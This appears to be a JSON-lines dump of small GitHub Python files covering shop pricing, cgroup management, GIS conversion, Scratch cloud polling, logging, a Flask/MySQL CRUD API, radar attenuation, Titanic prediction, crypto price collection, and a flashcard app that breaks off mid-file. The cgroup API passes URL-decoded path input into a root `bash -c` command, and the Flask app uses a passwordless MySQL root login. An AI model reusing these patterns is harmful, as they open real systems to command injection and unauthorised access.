+{"seq_id":"27714783452","text":"#A shop will give discount of 10% if the cost of purchased quantity is more than 1000.\n#Ask user for quantity\n#Suppose, one unit will cost 100.\n#Judge and print total cost for user.\n\nq= int(input(\"ENTER QUANTITY\"))\ndis=0\ntotalcost=0\nif(q*100>1000) :\n dis=.10*q*100\n totalcost= q*100 - dis\nelse:\n totalcost = q*100\nprint(\"TOTAL COST IS =\",totalcost) ","repo_name":"axaxthu/CODING-HOME-PRACTICE","sub_path":"shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"69951072807","text":"import os\nfrom subprocess import CalledProcessError, check_call\nfrom urllib.parse import unquote\n\nfrom cgroup_manager.cgroups.serializers import CgroupCreateSerializer, CgroupProcessAddSerializer\nfrom rest_framework.exceptions import NotFound, ValidationError\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_200_OK, HTTP_201_CREATED\n\ncgroup_path_prefix = \"/sys/fs/cgroup/\"\n\n\nclass CGroupProcessListAddAPIView(GenericAPIView):\n \"\"\"Lists tasks pids by cgroup. Raises 404 if cgroup does not exist. 'cgroup_path_fragment' should be urlencoded.\"\"\"\n\n queryset = None\n\n def get(self, request, *args, **kwargs):\n path = os.path.join(\n cgroup_path_prefix, unquote(kwargs[\"hierarchy\"]), unquote(kwargs.get(\"cgroup_path_fragment\", \"\")), \"tasks\")\n if not os.path.exists(path):\n raise NotFound()\n\n with open(path) as f:\n return Response(f.read().splitlines())\n\n def put(self, request, *args, **kwargs):\n \"\"\"Adds task to given cgroup. 'cgroup_path_fragment' should be urlencoded.\"\"\"\n serializer = self.get_serializer_class()(data=request.data)\n serializer.is_valid(raise_exception=True)\n pid = str(serializer.validated_data[\"pid\"]) # otherwise check_call fails\n path = os.path.join(\n cgroup_path_prefix, unquote(kwargs[\"hierarchy\"]), unquote(kwargs.get(\"cgroup_path_fragment\", \"\")), \"tasks\")\n try:\n check_call([\"sudo\", \"bash\", \"-c\", f\"echo {pid} >> {path}\"])\n except CalledProcessError:\n # on purpose. The error should not show command used as this might be a security risk\n raise ValidationError(\n detail={\"errors\": [\"Adding process to cgroup failed. Please check hierarchy and cgroup name.\"]})\n\n return Response(serializer.data, status=HTTP_200_OK)\n\n def get_serializer_class(self):\n # otherwise swagger complains\n if self.request.method == \"PUT\":\n return CgroupProcessAddSerializer\n\n\nclass CgroupCreateAPIView(GenericAPIView):\n \"\"\"Create cgroup in given hierarchy\"\"\"\n\n queryset = None\n serializer_class = CgroupCreateSerializer\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n hierarchy = unquote(kwargs[\"hierarchy\"])\n cgroup_path_fragment = unquote(serializer.validated_data['cgroup_path_fragment'])\n path = os.path.join(cgroup_path_prefix, hierarchy, cgroup_path_fragment)\n try:\n check_call([\"sudo\", \"mkdir\", \"-p\", path])\n except CalledProcessError:\n # on purpose. The error should not show command used as this might be a security risk\n raise ValidationError(\n detail={\"errors\": [\"Creating cgroup returned an error. Please check hierarchy and cgroup name.\"]})\n return Response(serializer.data, status=HTTP_201_CREATED)\n","repo_name":"jacoor/cgroup-manager","sub_path":"cgroup_manager/cgroups/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5426492592","text":"import geopandas\nimport os\n\n\n# shapefile转geojson: shapefile路径 geojson路径\ndef shp_to_geojson(shp_path, geoj_path):\n shp = geopandas.read_file(shp_path)\n shp.to_file(geoj_path, driver=\"GeoJSON\", encoding=\"utf-8\")\n\n\n# geojson转shapefile: geojson路径 shapefile路径\ndef geojson_to_shp(geoj_path, shp_path):\n geoj = geopandas.read_file(geoj_path)\n geoj.to_file(shp_path, driver=\"ESRI Shapefile\", encoding=\"utf-8\")\n\n\nif __name__ == \"__main__\":\n # ws = r'D:\\Work_PhD\\MISR_AHI_WS\\220210'\n # geoj = ws + '/AHI_view.json'\n # shp = ws + '/AHI_view.shp'\n # geojson_to_shp(geoj, shp)\n \n ws = r'D:\\Work_PhD\\MISR_AHI_WS\\221221'\n roi_name = '60.0_1'\n geoj = ws + '/ROIs_ex_json/' + roi_name + '.json'\n shp = ws + '/ROIs_ex_shp/' + roi_name + '_ex.shp'\n shp_to_geojson(shp, geoj)\n # # shp = ws + '/0_50_roi.shp'\n # # geojson_to_shp(geoj, shp)\n\n # ws_folder = r'D:\\Work_PhD\\MISR_AHI_WS\\220331'\n # geoj_folder = os.path.join(ws_folder, 'ROI')\n # shp_folder = os.path.join(ws_folder, 'ROI_shp')\n # if not os.path.exists(shp_folder):\n # os.makedirs(shp_folder)\n # geojs = os.listdir(geoj_folder)\n # for geoj_file in geojs:\n # roi_name = geoj_file.split('.')[0] + '.' + geoj_file.split('.')[1]\n # geoj_filename = os.path.join(geoj_folder, geoj_file)\n # shp_filename = os.path.join(shp_folder, roi_name + '.shp')\n # geojson_to_shp(geoj_filename, shp_filename)","repo_name":"Bosh0113/MISR_AHI","sub_path":"test/common_utils.py","file_name":"common_utils.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5687801879","text":"import requests, time, json\nfrom ScraGet.Exceptions import ProjectNotFound, InvalidValue\nfrom threading import Thread\nfrom typing import Union\n\nheaders = {\"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36\"}\n\nclass get_cloud_data:\n def __init__(self):\n pass\n \n def updateCloud(self, ID : Union[str,int], limit : Union[str,int]= \"10\", offset : Union[str,int]=\"0\") -> None:\n \"\"\"\n Requests to Scratch API for clouddata.\n\n **Params**:\\n\n `ID` - Mandatory. Put the project ID in *str* or *int* format.\\n\n `limit` - Optional (Default=10) Specify number of logs to be returned in *str* or *int* format.\\n\n `offset` - Optional (Default=0) Specify the offset for each log item in *str* or *int* format.\n \"\"\"\n info = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={ID}&limit={limit}&offset={offset}\")\n self.response_object = info\n self.response_time = info.elapsed.total_seconds()\n self.status_code = info.status_code\n \n if self.status_code == 200:\n info = info.json()\n self.cloud_data = info\n\n\nclass cloud:\n def __init__(self):\n self.stop = False\n \n def scan(self, ID: Union[str,int], delay: Union[float,int] = 1.0, NewThread: bool = True) -> None:\n \"\"\"\n Scans clouddata continuously every few seconds (duration to be defined by you while making the cloud class) for any changes.\n\n **Params**:\\n\n `ID` - Mandatory. Put project ID in *str* or *int* format.\\n\n `delay` - Optional(default=1.0). Put the time delay between 2 scan updates in *float* or *int* format. Minimum: 0.1 secs.\\n\n `NewThread` - Optional(default=True). Specify *True* if you need to run in a separate thread, specify *False* if you need to run in main thread. (*bool* format).\n \"\"\"\n\n \n def inner_dec(func):\n y = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={ID}&limit=10000&offset=0\", headers=headers)\n \n if y.status_code == 200:\n y = y.json()\n y = [json.dumps(item) for item in y]\n while True:\n time.sleep(delay)\n if self.stop:\n if NewThread:\n exit(0)\n break\n x = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={ID}&limit=10000&offset=0\", headers=headers)\n if x.status_code != 200: #can get 504\n continue\n x = x.json()\n\n x = [json.dumps(item) for item in x]\n if x != y:\n z = list(set(x) - set(y))\n z = [json.loads(item) for item in z]\n y = x\n self.change_log = z\n self.recent = z[0]\n self.user = z[0][\"user\"]\n self.type = z[0][\"verb\"]\n self.var = z[0][\"name\"]\n self.value = z[0][\"value\"]\n self.time = z[0][\"timestamp\"]\n func(self)\n\n else:\n raise ProjectNotFound(f\"Project with ID {ID} returned a status codes of: {y.status_code}\")\n\n def threaded_dec(func):\n scan_thread = Thread(target=inner_dec, args=(func,))\n scan_thread.setDaemon(True)\n scan_thread.start()\n self.thread = scan_thread\n\n if delay < 0.2:\n raise InvalidValue(\"Delay is less than 0.2. Try making the delay more than 0.2\")\n else:\n if NewThread:\n return threaded_dec\n return inner_dec\n","repo_name":"Quantum-Codes/ScraGet","sub_path":"ScraGet/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
+{"seq_id":"73816174568","text":"n=int(input())\nif(n==1):\n print(n)\nelse:\n count=0\n for i in range(1, (n//2)+1):\n for j in range(i, n+1):\n if(i*j<=n):\n count=count+1\n else:\n break\n print(count)\n","repo_name":"RajathRD/competitive-coding","sub_path":"SPOJ/AE00.py","file_name":"AE00.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13920928861","text":"import logging\nfrom typing import Optional\n\nlogger_initialized = {}\n\n\ndef get_logger(name: str,\n log_file: Optional[str] = None,\n log_level: int = logging.INFO,\n file_mode: str = 'w'):\n \"\"\"Initialize and get a logger by name.\n\n If the logger has not been initialized, this method will initialize the\n logger by adding one or two handlers, otherwise the initialized logger will\n be directly returned. During initialization, a StreamHandler will always be\n added. If `log_file` is specified, a FileHandler will also be added.\n Args:\n name (str): Logger name.\n log_file (str | None): The log filename. If specified, a FileHandler\n will be added to the logger.\n log_level (int): The logger level.\n file_mode (str): The file mode used in opening log file.\n Defaults to 'w'.\n Returns:\n logging.Logger: The expected logger.\n \"\"\"\n # use logger in mmengine if exist.\n try:\n from mmengine.logging import MMLogger\n if MMLogger.check_instance_created(name):\n logger = MMLogger.get_instance(name)\n else:\n logger = MMLogger.get_instance(\n name,\n log_file=log_file,\n log_level=log_level,\n file_mode=file_mode)\n return logger\n\n except Exception:\n pass\n\n logger = logging.getLogger(name)\n if name in logger_initialized:\n return logger\n # handle hierarchical names\n # e.g., logger \"a\" is initialized, then logger \"a.b\" will skip the\n # initialization since it is a child of \"a\".\n for logger_name in logger_initialized:\n if name.startswith(logger_name):\n return logger\n\n # handle duplicate logs to the console\n for handler in logger.root.handlers:\n if type(handler) is logging.StreamHandler:\n handler.setLevel(logging.ERROR)\n\n stream_handler = logging.StreamHandler()\n handlers = [stream_handler]\n\n if log_file is not None:\n # Here, the default behaviour of the official logger is 'a'. Thus, we\n # provide an interface to change the file mode to the default\n # behaviour.\n file_handler = logging.FileHandler(log_file, file_mode)\n handlers.append(file_handler)\n\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n for handler in handlers:\n handler.setFormatter(formatter)\n handler.setLevel(log_level)\n logger.addHandler(handler)\n\n logger.setLevel(log_level)\n logger_initialized[name] = True\n\n return logger\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/utils/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"}
+{"seq_id":"39813951570","text":"def caesar(s, n):\n s = list(s)\n for i in range(len(s)):\n if s[i].isupper():\n s[i]=chr((ord(s[i])-ord('A')+ n)%26+ord('A'))\n elif s[i].islower():\n s[i]=chr((ord(s[i])-ord('a')+ n)%26+ord('a'))\n\n return \"\".join(s)\n # 주어진 문장을 암호화하여 반환하세요.","repo_name":"cwadven/algorism_programmers","sub_path":"Level1/시저 암호H/clean_answer.py","file_name":"clean_answer.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18351081787","text":"from flask import Flask, jsonify, request\n\nimport mysql.connector\n\ndb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"\",\n database=\"banco\"\n)\n\napp = Flask(__name__)\n\n#Create\n@app.route('/api/notas', methods=['POST'])\ndef add_nota():\n cursor = db.cursor()\n title = request.json['title']\n content = request.json['content']\n cursor.execute(\"INSERT INTO notas (title, content) VALUES (%s, %s)\", (title, content))\n db.commit()\n return jsonify({'message': 'Nota adicionada com sucesso'})\n\n\n#Read\n@app.route('/api/notas', methods=['GET'])\ndef get_notas():\n cursor = db.cursor()\n cursor.execute(\"SELECT * FROM notas\")\n notas = cursor.fetchall()\n return jsonify(notas)\n\n#Update\n@app.route('/api/notas/', methods=['PUT'])\ndef update_nota(id):\n cursor = db.cursor()\n title = request.json['title']\n content = request.json['content']\n cursor.execute(\"UPDATE notas SET title=%s, content=%s WHERE id=%s\", (title, content, id))\n db.commit()\n return jsonify({'message': 'Nota atualizada com sucesso'})\n\n#Delete\n@app.route('/api/notas/', methods=['DELETE'])\ndef delete_nota(id):\n cursor = db.cursor()\n cursor.execute(\"DELETE FROM notas WHERE id=%s\", (id,))\n db.commit()\n return jsonify({'message': 'Nota deletada com sucesso'})\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"RafaelM4gn/python-backend-studies","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"11598993452","text":"import inspect\nimport wradlib as wlb\nfrom .utilities import do_call, str2numeric_dict_args\n\ndef calculate_pia_dict_args(radar, pia = None,\n dbz_field = 'DBZ_F',\n kdp_field = 'KDP_F'):\n if pia is not None:\n if pia['use_pia']:\n if pia['pia_field'] in pia.keys():\n pia_args = pia[pia['pia_field']]\n pia_args = str2numeric_dict_args(pia_args)\n\n if pia['pia_field'] == 'dbz':\n args_constr = [k for k in pia_args.keys() if 'constraint' in k]\n if len(args_constr) > 0:\n args_pia = [k for k in pia_args.keys() if k not in args_constr]\n args_constr, pia_args = map(lambda keys: {x: pia_args[x] for x in keys}, [args_constr, args_pia])\n\n if args_constr['constraints'] == 'both':\n pia_args['constraints'] = [wlb.atten.constraint_dbz, wlb.atten.constraint_pia]\n pia_args['constraint_args'] = [[args_constr['constraint_args_dbz']], [args_constr['constraint_args_pia']]]\n elif args_constr['constraints'] == 'dbz':\n pia_args['constraints'] = [wlb.atten.constraint_dbz]\n pia_args['constraint_args'] = [[args_constr['constraint_args_dbz']]]\n elif args_constr['constraints'] == 'pia':\n pia_args['constraints'] = [wlb.atten.constraint_pia]\n pia_args['constraint_args'] = [[args_constr['constraint_args_pia']]]\n else:\n pia_args['constraints'] = None\n pia_args['constraint_args'] = None\n\n pia_args['dbz_field'] = dbz_field\n else:\n pia_args['kdp_field'] = kdp_field\n\n pia_args['pia_field'] = pia['pia_field']\n\n return calculate_pia(radar, **pia_args)\n else:\n return correct_attenuation(radar, pia_field = pia['pia_field'])\n else:\n return None\n else:\n return None\n\n# args_dbz = ['a_max', 'a_min', 'n_a', 'b_max', 'b_min', 'n_b', 'sector_thr',\n# 'constraint_args_dbz', 'constraint_args_pia']\n# num_dbz = [float, float, int, float, float, int, int, float, float]\n# for k in range(len(args_dbz)):\n# pia_args[args_dbz[k]] = num_dbz[k](pia_args[args_dbz[k]])\n\ndef calculate_pia(radar, **kwargs):\n args1 = inspect.getfullargspec(correct_attenuation).args[1:]\n args2 = inspect.getfullargspec(wlb.atten.correct_attenuation_constrained).args[1:]\n args3 = inspect.getfullargspec(wlb.atten.pia_from_kdp).args[1:]\n pia_args = args1 + args2 + args3\n\n pia_kwargs = dict((key, kwargs[key]) for key in pia_args if key in kwargs)\n pia = do_call(correct_attenuation, args = [radar], kwargs = pia_kwargs)\n\n return pia\n\ndef correct_attenuation(radar, pia_field = 'dbz', dbz_field = 'DBZ_F',\n kdp_field = 'KDP_F', **kwargs):\n # path-integrated attenuation\n # pia_field: 'dbz' or 'kdp'\n dr = radar.range['meters_between_gates']/1000\n\n if pia_field == 'dbz':\n dbz = radar.fields[dbz_field]['data']\n pia_fun = wlb.atten.correct_attenuation_constrained\n pia_args = inspect.getfullargspec(pia_fun).args[1:]\n pia_kwargs = dict((key, kwargs[key]) for key in pia_args if key in kwargs)\n if not 'gate_length' in kwargs:\n pia_kwargs['gate_length'] = dr\n pia = do_call(pia_fun, args = [dbz], kwargs = pia_kwargs)\n\n if pia_field == 'kdp':\n kdp = radar.fields[kdp_field]['data']\n pia_fun = wlb.atten.pia_from_kdp\n pia_args = inspect.getfullargspec(pia_fun).args[1:]\n pia_kwargs = dict((key, kwargs[key]) for key in pia_args if key in kwargs)\n if not 'dr' in kwargs:\n pia_kwargs['dr'] = dr\n pia = do_call(pia_fun, args = [kdp], kwargs = pia_kwargs)\n\n return 
pia\n","repo_name":"rijaf-iri/mtorwaradar","sub_path":"mtorwaradar/util/pia.py","file_name":"pia.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1386976142","text":"from db_connector import engine\nfrom binance import ThreadedWebsocketManager\nfrom coinmarketcapapi import CoinMarketCapAPI\nfrom config import COINS, CRYPTO_TABLE_NAME\nfrom creds import MARKET_API_KEY, BINANCE_API_KEY, BINANCE_SECRET_KEY\nimport pandas as pd\nimport datetime\n\n\nclass MessageHandler():\n\n def __init__(self):\n self.last_hour = -1\n self.last_close = -1\n self.market_cap = self.get_market_cap()\n \n\n def handle_socket_message(self, msg):\n # Check if full minute passed\n if msg['k']['x']:\n df = pd.DataFrame([msg['k']])\n df = df.loc[:, ['t', 's', 'o', 'c', 'h', 'l', 'v', 'q']]\n df.columns = ['starttime', 'symbol', 'open',\n 'close', 'high', 'low', 'basevolume', 'quotevolume']\n df[\"market_cap\"] = 0\n symbol = df.loc[0, \"symbol\"]\n\n # Data Preperation\n df.open = df.open.astype(float)\n df.close = df.close.astype(float)\n df.high = df.high.astype(float)\n df.low = df.low.astype(float)\n df.market_cap = df.market_cap.astype(float)\n df.starttime = pd.to_datetime(df.starttime, unit=\"ms\")\n\n print(\"#############MARKET_CAP_TABLE#############\")\n print(self.market_cap)\n # Update market cap\n if self.last_hour != datetime.datetime.now().hour:\n self.market_cap = self.get_market_cap()\n self.last_hour = datetime.datetime.now().hour\n else:\n pct_change = 1\n if self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"last_close\"].values[0] != -1:\n pct_change = df.loc[0, \"close\"] / self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"last_close\"].values[0]\n self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"market_cap\"] *= pct_change\n print(pct_change)\n\n df[\"market_cap\"] = self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"market_cap\"].values[0]\n self.market_cap.loc[self.market_cap[\"symbol\"] == symbol, \"last_close\"] = df.loc[0, \"close\"]\n\n # Write to data base\n try:\n df.to_sql(CRYPTO_TABLE_NAME, engine, if_exists='append', index=False)\n except:\n print(\"DATABASE UNAVAILABLE SKIPPING WRITE\") \n print(\"#############WRITTEN DATA#############\")\n print(df)\n\n def get_market_cap(self):\n coins = \"\"\n for coin in COINS:\n coins += coin\n coins += \",\"\n coins = coins[:-1]\n coins\n\n cmc = CoinMarketCapAPI(api_key=MARKET_API_KEY)\n r = cmc.cryptocurrency_quotes_latest(symbol=coins, convert=\"EUR\")\n df = pd.DataFrame(r.data)\n df = df.transpose()\n df = df.drop([\"id\", \"name\",\"slug\",\"num_market_pairs\",\"date_added\",\"tags\", \"max_supply\",\"circulating_supply\",\"total_supply\",\"is_active\",\"platform\",\"cmc_rank\",\"is_fiat\",\"last_updated\"], axis=1)\n df[\"market_cap\"] = df[\"quote\"].apply(lambda x: x[\"EUR\"][\"market_cap\"])\n df = df.drop(\"quote\", axis=1)\n df[\"symbol\"] = df[\"symbol\"] + \"EUR\"\n df[\"last_close\"] = -1\n\n df.market_cap = df.market_cap.astype(float)\n df.last_close = df.last_close.astype(float)\n return df\n \n\n\nclass LiveDataCollector():\n\n def __init__(self):\n self.run = True\n self.twm = ThreadedWebsocketManager(\n api_key=BINANCE_API_KEY, api_secret=BINANCE_SECRET_KEY)\n\n def start(self):\n handler = MessageHandler()\n self.twm.start()\n\n # start any sockets here\n for coin in COINS:\n symbol = f\"{coin}EUR\"\n self.twm.start_kline_socket(\n callback=handler.handle_socket_message, symbol=symbol)\n print(f\"{symbol} socket started\")\n\n def stop(self):\n self.twm.stop()\n\n\nif __name__ == \"__main__\":\n ldc = LiveDataCollector()\n 
ldc.start()\n","repo_name":"chris-hoertnagl/market-analytics","sub_path":"coin_data_collector.py","file_name":"coin_data_collector.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"41904388234","text":"# https://leetcode.com/problems/intersection-of-two-arrays/\n\n\n# Given two arrays, write a function to compute their intersection.\n#\n# Example:\n# Given nums1 = [1, 2, 2, 1], nums2 = [2, 2], return [2].\n#\n# Note:\n# Each element in the result must be unique.\n# The result can be in any order.\n\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution(object):\n def preOrder(self, root, level, l):\n if root:\n if len(l) < level + 1:\n l.append([])\n if level % 2 == 0:\n l[level].append(root.val)\n else:\n l[level].insert(0, root.val)\n self.preOrder(root.left, level + 1, l)\n self.preOrder(root.right, level + 1, l)\n\n def zigzagLevelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n l = []\n self.preOrder(root, 0, l)\n return l\n","repo_name":"Kimice/Recoba","sub_path":"leetcode/binary-tree-zigzag-level-order-traversal.py","file_name":"binary-tree-zigzag-level-order-traversal.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33616963558","text":"# Leetcode Problem 3 \n# Oct 1 2020\ndef lengthOfLongestSubstring(s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n cur_s = \"\"\n maxl = 0\n dic = {}\n for c in s:\n if c in dic:\n ret_ind = 0\n for i in range(len(cur_s)):\n if cur_s[i] == c:\n ret_ind = i\n break\n del dic[cur_s[i]]\n del dic[c]\n cur_s = cur_s[ret_ind+1:]\n dic[c] = c\n cur_s = cur_s + c\n if len(cur_s) > maxl:\n maxl = len(cur_s)\n return maxl\n\n# print(lengthOfLongestSubstring(\"abcabcbb\")==3)\n\n","repo_name":"HuiwenHe19/Leetcode","sub_path":"prob3.py","file_name":"prob3.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8394598245","text":"import json\nimport os\nfrom createClass import People, DIR_FILE, make_dump\n\nmake_dump()\n\nwith open(DIR_FILE, 'r', encoding='utf-8') as file:\n dict_el = json.load(file)\n\n p1 = People(**dict_el)\n\nprint(\"Nome:\",p1.name)\nprint(\"Ano de nascimento:\",p1.age)\nprint(\"Email:\",p1.email)\n","repo_name":"Thiago-Teofilo/curso_python","sub_path":"python_curso_completo/m05_intro_poo/aula206_classe_json/loadClass.py","file_name":"loadClass.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"10814807444","text":"class Solution(object):\n def minOperations(self, nums, x):\n sums = sum(nums)\n if x>sums:\n return -1\n if x==sums:\n return len(nums)\n \n sums = sums-x\n cur, start, ans = 0, 0, -1\n \n for end in range(len(nums)):\n if cur < sums:\n cur+=nums[end]\n \n while cur>=sums:\n if cur==sums:\n ans = max(ans, end-start+1)\n cur -= nums[start]\n start+=1\n \n return len(nums)-ans if ans!=-1 else an\n\nclass Solution(object):\n def minOperations(self, nums, x):\n arr_sum = sum(nums)\n if arr_sum < x:\n return -1\n if arr_sum == x:\n return len(nums)\n \n required_subarray_sum = arr_sum - x\n left = curr_sum = max_subarray_size = 0\n for right, num in enumerate(nums):\n curr_sum += num\n while curr_sum > required_subarray_sum:\n curr_sum -= nums[left]\n left += 1\n if curr_sum == required_subarray_sum:\n max_subarray_size = max(max_subarray_size, right - left + 1)\n \n return len(nums) - max_subarray_size if max_subarray_size > 0 else -1 ","repo_name":"Ayushmanglani/competitive_coding","sub_path":"leetcode/Jan_2021/14_MinimumOperationsToReduceXtoZero.py","file_name":"14_MinimumOperationsToReduceXtoZero.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"72122434407","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nfrom hatta.config import read_config\nfrom hatta.wiki import Wiki\n\n\n# Avoid WSGI errors, see http://mercurial.selenic.com/bts/issue1095\nsys.stdout = sys.__stdout__\nsys.stderr = sys.__stderr__\n\n\ndef application(env, start):\n \"\"\"Detect that we are being run as WSGI application.\"\"\"\n\n global application\n config = read_config()\n script_dir = os.path.dirname(os.path.abspath(__file__))\n if config.get('pages_path') is None:\n config.set('pages_path', os.path.join(script_dir, 'docs'))\n wiki = Wiki(config)\n application = wiki.application\n return application(env, start)\n\n\ndef main(config=None, wiki=None):\n \"\"\"Start a standalone WSGI server.\"\"\"\n\n config = config or read_config()\n wiki = wiki or Wiki(config)\n app = wiki.application\n\n host, port = (config.get('interface', '0.0.0.0'),\n int(config.get('port', 8080)))\n try:\n from cheroot import wsgi\n except ImportError:\n wsgi = None\n\n if wsgi is None:\n import werkzeug\n try:\n werkzeug.run_simple(host, port, app, use_reloader=False)\n except KeyboardInterrupt:\n pass\n else:\n name = wiki.site_name\n server = wsgi.Server((host, port), app,\n server_name=name)\n try:\n server.start()\n except KeyboardInterrupt:\n server.stop()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"davestgermain/hatta","sub_path":"hatta/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"17211737672","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\n# Load the training and test data\ntrain_df = pd.read_csv(\"train.csv\")\ntest_df = pd.read_csv(\"test.csv\")\n\n# Initial data exploration\ntrain_df.head()\ntrain_df.info()\ntrain_df.describe()\nsns.countplot(x='Survived', data=train_df)\n\n# Data preprocessing\ntrain_df.drop(columns=['Cabin'], inplace=True)\ntest_df.drop(columns=['Cabin'], inplace=True)\ntrain_df['Age'].fillna(train_df['Age'].mean(), inplace=True)\ntrain_df['Embarked'].fillna(train_df['Embarked'].mode()[0], inplace=True)\ntest_df['Age'].fillna(test_df['Age'].mean(), inplace=True)\ntest_df['Fare'].fillna(test_df['Fare'].mean(), inplace=True)\n\n# Feature engineering\ntrain_df['Title'] = train_df['Name'].apply(lambda x: x.split(',')[1].split('.')[0].strip())\ntest_df['Title'] = test_df['Name'].apply(lambda x: x.split(',')[1].split('.')[0].strip())\ntrain_df['Title'].replace(['Dr', 'Rev', 'Col', 'Major', 'Jonkheer', 'Capt'], 'Rare', inplace=True)\ntrain_df['Title'].replace(['Ms', 'Mlle'], 'Miss', inplace=True)\ntest_df['Title'].replace(['Dr', 'Rev', 'Col', 'Major', 'Jonkheer', 'Capt'], 'Rare', inplace=True)\ntest_df['Title'].replace(['Ms', 'Mlle'], 'Miss', inplace=True)\n\n# Select the relevant features and target variable\nX_train = train_df[['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked', 'Title']]\ny_train = train_df['Survived']\nX_test = test_df[['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked', 'Title']]\n\n# One-hot encode the categorical features\nX_train = pd.get_dummies(X_train)\nX_test = pd.get_dummies(X_test)\n\n# Create a random forest classifier and fit it on the training data\nrf = RandomForestClassifier(n_estimators=100, random_state=42)\nrf.fit(X_train, y_train)\n\n# Use the trained model to make predictions on the test data\ny_pred = rf.predict(X_test)\n\n# Save the predictions in a CSV file\nsubmission_df = pd.DataFrame({'PassengerId': test_df['PassengerId'], 'Survived': y_pred})\nsubmission_df.to_csv('submission.csv', index=False)\n","repo_name":"jm0rt1/value-investing-data-mining","sub_path":"docs/examples/obselete/predicting_titanic_survival.py","file_name":"predicting_titanic_survival.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"42298973567","text":"BACKGROUND_COLOR = \"#B1DDC6\"\n\nfrom tkinter import *\nimport pandas\nimport random\n\ncurrent_card = {}\ndata_dict = {}\n\ntry:\n data = pandas.read_csv('data/words_to_learn.csv')\nexcept FileNotFoundError:\n original_data = pandas.read_csv('data/french_words.csv')\n data_dict = original_data.to_dict(orient=\"records\")\nelse:\n data_dict = data.to_dict(orient=\"records\")\n\n\n\ndef next_card():\n global current_card, flip_timer\n window.after_cancel(flip_timer)\n current_card = random.choice(data_dict)\n canvas.itemconfig(language, text=\"French\", fill=\"black\")\n canvas.itemconfig(question, text=current_card[\"French\"], fill=\"black\")\n canvas.itemconfig(canvas_image, image=front_img)\n flip_timer = window.after(3000, flip_card)\n\n\ndef flip_card():\n canvas.itemconfig(canvas_image, image=back_img)\n canvas.itemconfig(language, text=\"English\", fill=\"white\")\n canvas.itemconfig(question, text=current_card[\"English\"], fill=\"white\")\n\n\ndef is_known():\n data_dict.remove(current_card)\n data = pandas.DataFrame(data_dict)\n data.to_csv(\"data/words_to_learn.csv\", index=False)\n next_card()\n\n\nwindow = 